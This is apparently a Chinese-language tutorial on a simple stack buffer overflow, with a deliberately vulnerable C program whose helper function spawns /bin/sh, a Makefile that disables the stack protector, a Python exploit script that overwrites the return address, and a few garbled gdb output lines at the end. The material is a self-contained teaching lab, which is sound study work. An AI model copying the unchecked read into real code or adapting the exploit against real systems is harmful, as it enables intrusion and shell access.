简介 :
栈溢出是由于C语言系列没有内置检查机制来确保复制到缓冲区的数据不得大于缓冲区的大小,因此当这个数据足够大的时候,将会溢出缓冲区的范围。当溢出缓冲区之后 , 如果继续写入数据就有可能将内存中的重要数据覆盖 , 对程序甚至系统造成严重的影响 。骇客也会利用栈溢出来进行权限的提升等等非法操作
环境 :
1. ubuntu 16.04 64位
2. gcc 4.85
视频演示 :
代码 :
hello.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// 栈溢出后执行的函数
void bingo(){
system("/bin/sh"); // 调用 system 函数启动 /bin/sh 来获取 shell
}
int main(){
char buffer[36] = {0}; // 定义 36 个字符(字节)长度的字符数组 , 并全部初始化为 0
puts("Tell my why : ");
/* 溢出漏洞产生的原因就是因为 read 函数并没有对 buffer 数组的范围进行检查
* 如果我们向标准输入流中输入了超出 buffer 范围 (36个字节) 的数据 , 那么写操作并不会停止 , 而是会继续向内存中写入数据 , 而这些数据就是由我们控制的
* 我们知道 , buffer 数组是保存在内存中的栈段中的 , 而 main 函数的返回地址也是保存在栈段中的
* 因此 , 我们只需要控制写入的数据 , 将 main 函数的返回地址覆盖
* 这样 , 在主函数执行结束后 , 会 pop 栈中保存的主函数的返回地址 (事实上已经被我们写入的数据覆盖) 到 eip 寄存器中
* cpu 就会不会认为程序已经结束 , 而是继续根据 eip 寄存器指向的内存取指令执行 , 这样我们就达到了可以任意控制程序流程的目的
* 因此 , 我们为了能获取一个 shell , 我们需要将主函数的返回地址覆盖为 bingo 函数的地址
* 然后程序继续执行之后遇到 return 0 就会直接跳转到 bingo 函数 , 从而运行 /bin/sh , 我们就可以得到目标主机的 shell
* 由于时间关系 , 这里所有的操作都在本机进行 , 远程操作也是同样的道理 , 因此不再赘述
*/
read(0, buffer, 0xFF); // 使用 read 函数将标准输入流中的数据复制到 buffer 字符数组
printf("Good boy : %s\n", buffer); // 打印字符数组的长度
return 0; // 主函数返回
}
Makefile
a.out:hello.c
gcc -g -fno-stack-protector hello.c
clean:
rm ./a.out
exploit.py
#!/usr/bin/env python
# encoding:utf-8
from zio import *
Io = zio("./a.out") # 打开本地文件
payload = (0x7fffffffdd88 - 0x7fffffffdd50) * 'A' # 首先将 buffer 和 main 返回地址之间的所有数据都填充成垃圾数据 , 其实是为了能覆盖到 main 的返回地址
payload = payload + l64(0x4005ed) # 将 main 的返回地址覆盖为 bingo 的地址
# 这里的 l64 函数可以将一个 16 进制数转换为 64 位机的内存地址
# 我们知道 64 位机的机器字长为 8 字节 , 因此就需要用 8 个字符来填充
# 16 位机的寄存器是 16 位数的 , 两个字节 , 64 位机相应就是 8 字节
# 其实 l64(0x4005ed) 函数就返回了这个字符串 :
# "\xed\x05\x40\x00\x00\x00\x00\x00"
# 也可以直接手动写成上述字符串
# 现在开始写入数据
Io.write(payload)
# 写入之后应该执行 bingo 函数 也就是启动 /bin/sh
# 这个时候 , 我们就需要接管程序的输入输出
# 调用 interact() 这个函数来释放脚本对程序的控制
Io.interact()
# 现在脚本就编写完成了 , 测试一下吧
README.md
(gdb) 我们来整理一下这几个数据Quit
(gdb) 1. bingo 地址 : 0x4005edQuit
(gdb) 1. 偏移 : (main返回地址 - buffer首地址) = (0x7fffffffdd88 - 0x7fffffffdd50Quit
